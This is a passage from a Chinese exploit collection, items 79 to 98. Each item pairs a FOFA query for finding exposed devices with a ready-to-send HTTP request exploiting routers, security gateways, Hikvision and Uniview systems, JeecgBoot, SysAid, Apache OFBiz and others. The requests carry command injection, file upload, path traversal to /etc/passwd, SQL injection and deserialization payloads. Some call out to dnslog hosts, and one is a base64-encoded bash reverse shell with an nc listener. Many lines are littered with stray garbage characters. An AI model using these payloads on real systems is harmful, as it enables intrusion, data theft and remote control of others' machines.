- e7 p. T. n+ q$ }: |+ zGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.17 [; S4 W1 j! z* U; O2 Z
Host: x.x.x.x
9 U! r) d0 z* q6 m6 C& N) f6 i
- {: ?) z. ^7 ]9 X
9 h0 d5 T) D# c. F% O3 ^79. BYTEVALUE 百为流控路由器远程命令执行
+ J: }4 s6 N( U! A2 h$ fFOFA:BYTEVALUE 智能流控路由器" `7 ^0 u/ d( m$ Y6 r
GET /goform/webRead/open/?path=|id HTTP/1.10 \4 X" L+ g+ k2 ~7 ]" n1 T
Host:IP* P2 _( {# w6 x2 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ j) ?' [; X* A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 [' m8 q2 n& D' W- W( wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' }; I; L) f/ A. W
Accept-Encoding: gzip, deflate+ Y9 k# }8 p& u% W" Z
Connection: close
. V) Y" ^8 N1 yUpgrade-Insecure-Requests: 13 q0 i" M0 O; o8 a' A- k: [, F# g
7 l& F& Q0 D8 w! b6 d* U7 O* k$ S
' M. y3 ?0 R1 z( e5 c/ Q80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
& g0 W) B! w( c) g) w' I4 Z5 kFOFA:app="速达软件-公司产品"
/ C: F+ m3 e. y7 l% e$ \' vPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.16 B9 O* }$ m& p( [2 @
Host: x.x.x.x3 L# j( u9 w1 \6 v/ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; x$ e! C( _' [$ X, ^Content-Length: 27, d% E! ], ?* O. a0 A- f3 z! `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* A2 O6 Q/ c: ]3 y+ ^
Accept-Encoding: gzip, deflate
. M! [; W1 Y! X: d6 {! |# w) T5 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, e7 S) Q+ k+ w% D0 J0 r
Connection: close/ M% v* L0 {0 l- e4 ]1 r
Content-Type: application/octet-stream
% V5 O- @! F$ p6 vUpgrade-Insecure-Requests: 1+ q: l$ s7 p* c3 @
: T, u- g k- _9 J' z' z8 Z
<% out.print("oessqeonylzaf");%>
9 ^* k, r$ s. S+ w
9 Y# F- p$ ?/ Y& O( c2 Z0 V+ @8 d! ?2 C" c) R
GET /xykqmfxpoas.jsp HTTP/1.1# @0 |3 s$ ?. S5 A2 C
Host: x.x.x.x
: w9 h1 K& N) _! J: zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 L& b2 J; u6 e& n5 OConnection: close# L' o5 E* q" N6 f M3 _8 s4 d
Accept-Encoding: gzip
7 }" `7 }6 n. i( s# I; u7 h& a |3 b7 N$ r4 K# o
" H( l0 [/ d4 h& \
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
, W/ f- x8 e G2 rFOFA:app="uniview-视频监控"5 y$ G1 N1 E: I" ?; N2 A5 s, E
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
& V G# f% Y/ G9 k2 F& M, h6 jHost: x.x.x.x
" {! D7 x4 S2 I7 V; j3 U nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ c7 `+ t" z9 B/ OConnection: close
: E0 j! `3 Q. _Accept-Encoding: gzip
9 l" e4 ]" z, h# {1 \' f0 u
7 f! Y9 x4 n# X1 j$ I+ L) F9 {) E" A/ }2 V4 I8 B! D
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% [$ `# Q$ ]9 B; F; KFOFA:app="思福迪-LOGBASE"2 ]- M6 s1 k6 N5 U# x5 _ e
POST /bhost/test_qrcode_b HTTP/1.11 S% E- v& C; X4 f- t @
Host: BaseURL
' T7 z9 e) p x% o" M/ U0 }User-Agent: Go-http-client/1.1
, b9 @( a' H7 [0 E/ K- QContent-Length: 23
7 K# z! ?, Y: e, W3 W8 MAccept-Encoding: gzip
; y. ^1 F; m% G" @1 J, EConnection: close* u. w. I6 |. V7 B) l! t' \
Content-Type: application/x-www-form-urlencoded: m4 p' W! c9 `1 ~$ B
Referer: BaseURL
" w$ s3 Q; f6 w0 l% P
2 _9 s& |/ A5 n, l8 Q8 oz1=1&z2="|id;"&z3=bhost
1 p0 x) `0 i& _ l, w
- n" c6 D! ?# t. V1 \! R, }; E( f' ~& i) }, y
83. JeecgBoot testConnection 远程命令执行$ C* l9 x" ^1 {; S3 g
FOFA:title=="JeecgBoot 企业级低代码平台"
& b e& J, Y* t$ J+ `4 x
' s9 \0 P7 {( K! s8 E- C9 m' y1 W9 ~" i, b
POST /jmreport/testConnection HTTP/1.1" C' \, a$ ~) [/ h ~, x+ l; m
Host: x.x.x.x
# P3 ]" o2 n7 i/ o* _* \- u' vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( Y9 Q$ q% ], y+ }
Connection: close
) E) c! \; X) D5 A0 aContent-Length: 8881. {, @) F) M8 h
Accept-Encoding: gzip" @5 u9 B, t* }- h( z( e
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
7 Z9 Y; O$ O) o0 y$ l0 q8 aContent-Type: application/json0 U/ Y* c% `7 {' K' f3 `
8 L" w* O9 x9 e4 B% ]. D ~PAYLOAD
* O6 q$ ]4 e. V9 p T# t; J2 _
4 K! b7 a+ P6 t( ]84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ d/ f: O( c7 k( O) B; V/ ~1 c# lFOFA:title=="JeecgBoot 企业级低代码平台") z, q r/ P6 m& @
4 h8 [% S- H: W8 B* N
7 x$ `1 P: l( J% \! @# m
2 n. `/ `/ F Z% J
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1) {: v( ?: a6 w# T. z! t& _' |$ `* |
Host: 192.168.40.130:8080
; F& ^! P) R9 p7 Y* QUser-Agent: curl/7.88.1
* p3 m* i7 R: f6 _ rContent-Length: 156
9 q1 j4 s% r" D0 i4 UAccept: */*
, q. i9 {7 k f8 WConnection: close- B6 i2 f8 u/ v1 x R; z& v
Content-Type: application/json% J+ L* ^7 t7 y9 P$ o" a
Accept-Encoding: gzip' U8 Z+ t' _: y5 a
. m$ g2 {! M) m: ~
{
5 U F1 b2 {: Q- s; q. T "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",( ?( Z& V9 W( R- a4 h, c( x
"type": "0"
/ G! d) w0 w" i# e6 K0 P' r. E}1 G2 j0 u1 J# s7 @% q8 U
5 }' X- e2 h, |) {: J$ L0 |/ w
) q( ^ Z6 T' e7 ^6 p0 h1 y85. SysAid On-premise< 23.3.36远程代码执行! Y# s" M4 P" W4 V0 o$ d7 d) M
CVE-2023-47246
3 {& F% E" W; f2 h) |FOFA:body="sysaid-logo-dark-green.png" * H3 U1 e9 _. N$ O
EXP数据包如下,注入哥斯拉马
4 d) V5 C& P5 r1 p0 N) xPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.16 n) ]& G% X3 I
Host: x.x.x.x
/ _6 L7 [6 Z( }& Y3 \: S1 B6 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 r* {1 e9 g9 A. g, O7 F) T* `5 o$ F
Content-Type: application/octet-stream
7 O3 w6 V+ B! g8 U5 MAccept-Encoding: gzip; x" }+ ~6 q+ q. b0 v" H
( w! h0 B* R6 H/ W3 k
PAYLOAD/ T$ {! _ G+ u I# _
+ u4 ^5 B# m. Y& K! Y% y9 x- b1 v
回显URL:http://x.x.x.x/userfiles/index.jsp4 V2 c) }- w. H4 ?
3 a4 d; e2 g& _& X
86. 日本tosei自助洗衣机RCE) I o- j% V0 N5 E5 n+ o6 x* F+ q6 P
FOFA:body="tosei_login_check.php". f9 A- h r$ m* a' ^5 r
POST /cgi-bin/network_test.php HTTP/1.1
3 o9 u- C. j0 C* R- JHost: x.x.x.x
^, d, ?- }% C* p# s2 vUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. d+ w. j8 s( ^% s u! H/ p
Connection: close9 [, c0 u, Z3 D. ^; F0 g7 \. d) S. L
Content-Length: 44+ c1 ^/ }# [' U! j( ~
Accept: */*
/ B. p& `2 @, O R- ^4 l5 e4 d/ d+ P! o& tAccept-Encoding: gzip5 B+ F! u$ P3 m k
Accept-Language: en( _4 t+ W& t2 {) L8 [7 X! Q# ?
Content-Type: application/x-www-form-urlencoded
5 P+ V5 a* ~. P6 C) R
8 a1 r+ \+ ~1 r1 G& h! Lhost=%0acat${IFS}/etc/passwd%0a&command=ping
2 v/ Z) \4 Z! E# c- f! A' k$ l3 C3 Q5 p; O9 }, [ U% a
' z5 x* F ~$ ~/ p87. 安恒明御安全网关aaa_local_web_preview文件上传% y+ z# L- S' |% t6 p4 c
FOFA:title="明御安全网关" k7 K Q5 p: J; a1 s7 R
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
+ j! |+ _ G4 {' z1 T4 o( _Host: X.X.X.X* ?0 n6 H% V+ N' W4 c5 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ p0 h9 i6 U3 g$ o% WConnection: close& V3 @* y) M) g8 X
Content-Length: 198
; G; d6 G) N" q8 P( i$ e+ f# r! W3 uAccept-Encoding: gzip: e2 `+ ]7 J7 \3 d* e' z+ R, o
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
1 ]/ U2 C. ?. S0 S; ?0 F
: S: f# m. k! A; B5 x5 w1 ~--qqobiandqgawlxodfiisporjwravxtvd
% K. N) c8 K" [% C' W+ iContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"/ Q% @# l% R$ c/ h+ X0 a
Content-Type: text/plain
7 S. [- p$ [( T& {3 t2 ~7 h P3 N1 A4 s
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
3 m2 T8 A2 @( S0 l--qqobiandqgawlxodfiisporjwravxtvd--
+ R6 I1 L' }. f! s; Y/ L% j. k
# t( s9 `% @ l5 b0 P" P! ~: v* s8 o K1 ]
/jfhatuwe.php
) S' \% `! w2 A; s( c8 w, x
1 ?# g& N+ T; b8 e& y3 D$ s) I88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 ~: M! V; e, e8 ^5 H' E2 r
FOFA:title="明御安全网关": U# D; \* A; w2 }
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1, s: I) J. x; @$ ?
Host: x.x.x.xx.x.x.x9 A2 ]% E2 H+ T5 x8 t+ R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
J7 q2 y* f$ ?% t* D7 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. ?& z1 ]$ z& qAccept-Encoding: gzip, deflate
7 v1 R6 E% T& d7 y; tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* x( J6 U3 {4 [2 L$ ?3 o- X
Connection: close; r; p* U% H. U1 _6 v" u
* X7 h# p% y! K5 Q4 C% X
, m+ j N( I% S+ W# l
/astdfkhl.php
! ~* ?6 ] k; o" z
2 z) @1 W0 y: O& f5 `89. 致远互联FE协作办公平台editflow_manager存在sql注入
; F, N& z) `0 c# mFOFA:title="FE协作办公平台" || body="li_plugins_download"
0 B& a, g/ F0 e1 L7 w: R. yPOST /sysform/003/editflow_manager.js%70 HTTP/1.1! C1 m7 q& ^1 J' N* p. @& s( v# u- b
Host: x.x.x.x
& B) a' O+ s1 ?) g; aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 \9 z" s9 \: ~5 \+ L0 p
Connection: close
! f& }7 P5 k( } F& aContent-Length: 41
) j2 U O( n9 W NContent-Type: application/x-www-form-urlencoded
0 P+ X J1 \0 j6 S/ ~Accept-Encoding: gzip% U7 V" W4 _4 F+ Q
, ?! `2 y" q% k" E% F
option=2&GUID=-1'+union+select+111*222--+& S' ]) Y/ g# L4 d8 }4 c$ r8 ]
3 ~3 p3 q$ r- T; i+ ~3 r! _
' i6 [ Q" B" ?+ m90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行) h& L; D0 F% h1 M( S, y; k& D
FOFA:icon_hash="-1830859634"
; B1 A# F! E9 {+ _POST /php/ping.php HTTP/1.1
9 m, T" G" Z+ i) zHost: x.x.x.x
' i; @8 T6 m$ A% W3 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. h% x( _* h p" l7 E
Content-Length: 515 n2 h( q: n' N! A+ |; B& u& J; b! q
Accept: application/json, text/javascript, */*; q=0.01
4 \- P+ M' d7 V" Z8 a: A# J q0 r1 `Accept-Encoding: gzip, deflate+ h2 B4 B m5 F) o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( @: W4 X" D5 F1 B- e: Z6 jConnection: close
4 \! N0 G9 l2 g! W; i4 L5 X" |* EContent-Type: application/x-www-form-urlencoded
% ` @ `9 M/ M1 U4 OX-Requested-With: XMLHttpRequest
2 x7 B7 l. Y) w8 r3 @# ?. R5 S
% u* U0 X, \1 K8 d) T( ejsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig% L& t% Q1 C: x( K
+ v! n; ~& ?# U) N' Q0 l5 L2 h3 Q2 L" }% U- ]- F( S# Q
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取7 v0 v3 z! R1 N8 Z* i9 W
FOFA:title="综合安防管理平台"
3 q& _' M/ K- S+ H% Y! HGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
( W3 d: A5 u! Y1 x, LHost: your-ip
4 r# F, i+ Y5 e* J$ L7 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1 m0 u/ p" c" ~# R9 T! Q" MAccept-Encoding: gzip, deflate
) {- [8 `. \) H, J5 j: U) NAccept: */*
4 s4 ?5 A" j3 Q8 dConnection: keep-alive
: M( F6 c# I) a0 I J# W" K t) c: _; w6 A
5 T) T! I2 U9 @( _% H! Y8 w8 \3 e2 u" x, }
92. 海康威视运行管理中心session命令执行 `* L9 T" c/ c# n+ |0 Z/ `
Fastjson命令执行
7 i0 S+ ]4 c( Z) I- b& S2 k( P+ t: phunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
: Y5 [- N R7 b$ {$ }: @% c NPOST /center/api/session HTTP/1.1
' E7 C/ H! N# M% f" F8 o2 N1 KHost:0 R8 Q# ~) ]+ Z7 K- D6 n5 N5 Y5 U" x
Accept: application/json, text/plain, */*
% M) ^* H) B2 d8 K7 O8 r0 |4 T0 W: GAccept-Encoding: gzip, deflate
2 C" d6 E. v1 G/ i0 HX-Requested-With: XMLHttpRequest4 {/ h# N( F, G! u, z
Content-Type: application/json;charset=UTF-83 V; c& E( v+ i/ {9 ~1 \( t( O
X-Language-Type: zh_CN
8 R7 ^3 Y/ Q: S% f& V: ^Testcmd: echo test
$ i! M& D# c1 H7 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4 C" ~1 _* O* M. n: AAccept-Language: zh-CN,zh;q=0.98 ?* W9 k; E9 q
Content-Length: 5778
9 z9 d3 V, G: D& ~; u+ F
+ Y+ m# `" R$ |: n7 A" I- M7 ^PAYLOAD3 k. ^% s) L% X: a- d
9 M( B9 q* v/ r7 k5 H1 g# |
6 `6 [7 v5 B E% c; Q( l93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
]" m5 i# X) E/ u8 kFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
7 W, P2 Q3 z0 N( E/ I0 uPOST /?g=app_av_import_save HTTP/1.1 |# S, Q M: T# n3 w( h7 o4 P
Host: x.x.x.x: o! @) F8 d5 z( o" S4 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx) p* B4 ]. l6 v8 U5 }5 K: }: _! k
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: N7 R" b5 W8 X$ L) W; E, B2 |* f
6 E W: h. D u9 V& j------WebKitFormBoundarykcbkgdfx; @/ R* r5 O0 d O2 i" a$ K; B3 Z
Content-Disposition: form-data; name="MAX_FILE_SIZE"
8 ?$ q! f# S+ |4 H* j
, h" e! r5 j0 L/ h& N7 K& W10000000
, _3 B7 W7 v' ^1 v1 A+ ^, d2 ]! V------WebKitFormBoundarykcbkgdfx' l* X! X' ^4 h' Y
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"/ ~6 \! v8 m3 ?1 B8 ?+ r
Content-Type: text/plain) b* b& T$ m8 Q% p- l) v
$ T5 b' c Q0 K6 U0 e3 \- c& S8 R
wagletqrkwrddkthtulxsqrphulnknxa
- v- q( t, T" `; C* E------WebKitFormBoundarykcbkgdfx% d3 Y9 \; ?5 |2 D
Content-Disposition: form-data; name="submit_post"
* y" l( z% K m; b6 ^
* r( r, K% _) s* yobj_app_upfile
* b! L: A! s+ V% z6 g------WebKitFormBoundarykcbkgdfx
`" u2 _+ v ?4 F1 ?Content-Disposition: form-data; name="__hash__"7 U$ O$ Q' v7 S4 u/ X7 ?4 b
1 E% i+ T) `& E$ F7 a: d
0b9d6b1ab7479ab69d9f71b05e0e9445
& k" O2 z4 l2 f6 \; _' o( ^------WebKitFormBoundarykcbkgdfx--6 E+ T( E% U( P I
9 m$ k; P Y& Q& J+ {) m; H4 Q, ^ y3 @4 q% E$ ], \) }5 T
GET /attachements/xlskxknxa.txt HTTP/1.18 c' x$ ^: E# b
Host: xx.xx.xx.xx
5 k! b5 |, ^7 j$ jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 @& X( a' p2 Q( B0 c( f1 H$ [, p
; _5 z+ [9 [2 c2 p$ l5 y' X' U* ]. i2 N# W: l+ I- i
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
& [) V1 ]9 X" N- X( P- aFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="0 f+ i( ]' e! l: E
POST /?g=obj_area_import_save HTTP/1.1/ n6 K7 D r7 B9 i% T8 n
Host: x.x.x.x" o$ ^. m; h* F; g @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
- |) g$ S5 B$ V. E3 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; v: v% T) [! T8 U+ V* N: x- M
7 z9 p8 R4 A) \ F6 ~1 p------WebKitFormBoundarybqvzqvmt
3 S" w! D4 h3 V% a) XContent-Disposition: form-data; name="MAX_FILE_SIZE"
% }' x' @* [& s/ U6 e( [* q0 M( O
10000000. [! G4 R9 v% T' N) W) D# M5 Q6 d
------WebKitFormBoundarybqvzqvmt
- p5 s. s0 u- U/ x9 ^4 dContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
# i" W5 T8 L! q6 ]Content-Type: text/plain+ Z/ Q* M' }9 A1 b7 I
; r/ S w1 S# w- S4 W, X5 Opxplitttsrjnyoafavcajwkvhxindhmu
6 j2 S7 R' _( M/ N: P2 u- N------WebKitFormBoundarybqvzqvmt
9 s5 e, P! b0 w( RContent-Disposition: form-data; name="submit_post". \2 O: P) I9 k- a0 L3 ~2 A1 O
1 C0 C4 {' f) T
obj_app_upfile( ?5 a. C7 ~* _ ?5 \! `( [6 g( A- Q
------WebKitFormBoundarybqvzqvmt
7 y t' Q" @8 I2 \. N# _' wContent-Disposition: form-data; name="__hash__"
+ M2 y9 w5 ?. s( w7 M0 H4 j$ m+ I1 G
) v [- Z. g2 I3 M) w) z3 b0b9d6b1ab7479ab69d9f71b05e0e9445& i. N( h4 l8 {8 B5 s! a. }7 M
------WebKitFormBoundarybqvzqvmt--( j1 J6 S8 h1 S8 l
! D& Z7 o1 t+ M: p% d
+ m( L/ q% m6 {1 r# v e4 z% o% R6 `4 S- `( {" [5 V. X8 k, i
GET /attachements/xlskxknxa.txt HTTP/1.1) m) J+ d9 a0 h7 D
Host: xx.xx.xx.xx& @$ a, X' P2 w! v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& j) ]: [$ X7 |" ~0 @, {
# x) q% E# b3 @: r, R
m. Y6 R8 Q3 V5 Z% L& Q+ s# W3 N4 y5 J8 I2 p# G
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
2 I3 n& k) C9 o) sCVE-2023-49070
4 C9 a5 v M% W& E) O8 bFOFA:app="Apache_OFBiz"
0 ?; M9 o% l7 E+ |POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% M, M0 C( c: _8 }1 J0 B: ]4 aHost: x.x.x.x
`! M0 \- r7 s4 G' s& U. o; eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 c3 j8 O1 S/ C3 i$ W( lConnection: close
& X4 e& H7 g# U- r' m0 MContent-Length: 889
9 j: |* i* v4 Q" c+ L5 N' PContent-Type: application/xml7 x% V; `* E7 n' @$ g4 _( j
Accept-Encoding: gzip, O+ P6 j' H: `' G! E9 C9 T
' S& w$ x: l+ K, a<?xml version="1.0"?>' D8 O/ |$ I6 c/ v4 r; P
<methodCall>
& h$ u3 {) C0 H* C6 u( v7 l O <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
& d3 n) n2 S2 ]2 Q( b1 D2 e <params>" c9 S5 N2 ?" d: _3 b
<param>2 T) @; |5 [! p0 K" B
<value>
( p6 v# _9 D3 a1 {, o1 } <struct>
& ]8 Q$ @ z# Z7 ?9 M$ W <member>
O% {# Q& {; |$ f1 [ <name>test</name>% {4 c# |' n$ I6 \. {8 l0 h
<value>: g8 v }# z0 k. @
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>: y, o/ P; F0 n( ^" W! D- I/ M
</value>+ b& i) A6 j* H& }& ^; P2 q" ~
</member>% m( n* ?/ m1 C# b% C9 \
</struct>
# u1 s) Y, O. `* k r/ [, y </value>
+ c7 e0 T# ?! b( n </param>
& v9 G& Q8 y P0 K: R2 M, Q; I </params>
% J# p. J) J1 f2 R</methodCall>' X' V: ?1 W* O4 w9 E: Y# L
6 I! f- I3 L8 ^8 I( \5 I2 j
: G+ ^0 J3 G4 L) J用ysoserial生成payload) Z$ R) {# C7 t0 F0 T
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"& u. [6 X6 z6 A$ z+ t* V, W
O Y, g, }$ e4 M; y: R
) b, O& Q- v% q5 Y1 k; E8 W Z将生成的payload替换到上面的POC
' x6 s; j' p# ]8 `( _, h" h3 E* CPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: @/ a2 q5 r {) E6 EHost: 192.168.40.130:84433 A* z3 ?4 A6 Q( e: |* A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ {3 W" l* P7 z! c( d" r# z
Connection: close& @! O. X; k; N5 E1 X; [1 |* b% M
Content-Length: 889
* d9 |+ r$ m Z( \Content-Type: application/xml
n% q; f V* I0 _3 [1 @. _+ Y. XAccept-Encoding: gzip% x" o! M3 e" ]8 w6 t; F
7 i- f7 J7 b* E- v3 [
PAYLOAD2 ?9 [% r2 B# ?3 ]! O6 h
- V. i* l* a# o* b
96. Apache OFBiz 18.12.11 groovy 远程代码执行' Y; D. }. Q+ E7 C( M3 U
FOFA:app="Apache_OFBiz"
' H7 _% y- M3 Z/ O3 n$ u7 u& NPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.11 z4 m" _5 G$ J' _1 Z; c+ z
Host: localhost:8443& i. c+ Y/ X& W. T0 \0 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: L8 E, s9 ]" F0 [& r2 a2 v% RAccept: */*
1 Q& L# ?" F, w. h( oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' q5 q3 l K$ ?! E# @" K: j
Content-Type: application/x-www-form-urlencoded5 B* H/ k4 s$ B9 `+ B1 l
Content-Length: 55, R$ U" w0 ?5 S' C J k
: \' y7 P1 O6 \$ J" f1 `/ X
groovyProgram=throw+new+Exception('id'.execute().text);
/ v1 @& O3 }/ k0 H- N
4 F9 J9 J+ P% G7 J7 R
2 w5 K j# H, V, ~: r/ X: `反弹shell
( W2 T$ K, Z0 K$ j0 E在kali上启动一个监听
4 b% j& ?8 c( ]% v p) J: A" anc -lvp 77776 N( p# y: e. p8 U( P- \2 u' I
3 S( f+ X7 R2 N' P/ u3 g4 j
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.18 o; |3 k D9 F# Z& N. P, d
Host: 192.168.40.130:8443
$ j5 M& U9 m& ~; F) NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* K" D9 ~/ ~, f) eAccept: */*
$ a( ?& p) ^& [2 k+ bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 F- Q" W1 r/ D w* v% dContent-Type: application/x-www-form-urlencoded/ C0 z9 p1 }' }, r( |! |$ K" G: K
Content-Length: 71
: y& }& R2 p2 R6 S3 `4 Z' S4 v! [+ h% _( |& O* q
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
" c- ?3 e+ k3 ^( P
& C7 g* [0 d8 z; T" |. k97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ \, Z4 p5 m1 g5 H# FFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客". H! ^2 D- ^: _# }
GET /passport/login/ HTTP/1.1
, |3 P0 N) d8 |: b9 c4 g/ h7 fHost: 192.168.40.130:80852 t/ k( a/ M4 e, C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 u' q9 P5 C/ ^& z; L* x
Accept-Encoding: gzip
! J7 _% Y/ S" D9 JConnection: close+ v+ ` W* J6 C: ?) b* ^
Cookie: rememberMe=PAYLOAD
# t, F4 F1 P. E6 v7 ]. {/ lX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"8 l, N6 q, l$ W. K5 A
( h( H3 e5 R0 [" `* q- H/ t9 t. x% Z3 W1 e& w7 @, ^
98. SpiderFlow爬虫平台远程命令执行& u; ?7 y2 a2 ^7 I
CVE-2024-0195" j) h# O8 `1 d0 u
FOFA:app="SpiderFlow"7 a3 m K3 u' s
POST /function/save HTTP/1.1
' v1 g/ w$ j \; _! H [Host: 192.168.40.130:8088
! u$ B- f2 z0 a% C& l# f/ S) XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) [! H9 K( k# [7 g0 h+ l8 G
Connection: close! z5 u) \+ N4 _
Content-Length: 121
